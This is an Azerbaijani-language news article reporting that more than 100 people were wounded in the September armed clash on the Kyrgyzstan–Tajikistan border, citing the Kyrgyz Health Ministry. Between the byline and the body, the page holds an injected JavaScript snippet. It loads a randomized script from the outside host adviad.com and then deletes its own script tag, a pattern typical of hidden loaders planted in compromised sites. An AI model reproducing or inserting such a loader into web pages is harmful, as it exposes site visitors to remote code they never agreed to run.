Qırğızıstan-Tacikistan sərhədindəki atışmada yaralıların sayı 100-ü keçdi

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Qırğızıstan-Tacikistan sərhədində baş vermiş silahlı qarşıdurma nəticəsində sentyabrın 17-si saat 09:00-a olan məlumata görə, tibb məntəqələrinə daxil olan xəsarət alanların sayı 103 nəfərdir.

Bu barədə Qırğızıstan Səhiyyə Nazirliyinin mətbuat mərkəzindən məlumat verilib.

Yaralılardan beşi ambulator müalicəyə göndərilib.

Xəsarət alanlar əsasən bədənlərinin müxtəlif nahiyələrində qəlpə və güllə yaraları alıblar.

Xatırladaq ki, sentyabrın 16-da səhər saatlarında Qırğızıstan və Tacikistan sərhədində bir neçə yerdə atışma başlayıb. Leylek və Batken rayonlarında yaşayış məntəqələri atəşə tutulub.

Qırğızıstan-Tacikistan sərhədində baş verən silahlı qarşıdurma nəticəsində Batken və Leylek rayonlarının yeddi kəndinin, həmçinin Oş vilayətinin Çon-Alay rayonunun Cəkəndi kəndinin  sakinləri evlərini tərk ediblər.

Qeyd edək ki, bundan əvvəl 24 nəfərin həlak olması, 87 nəfərin yaralanması barədə xəbər yayılıb.

Mənbə: 24.KG

Oxu.az

Bu yazılara da göz atın...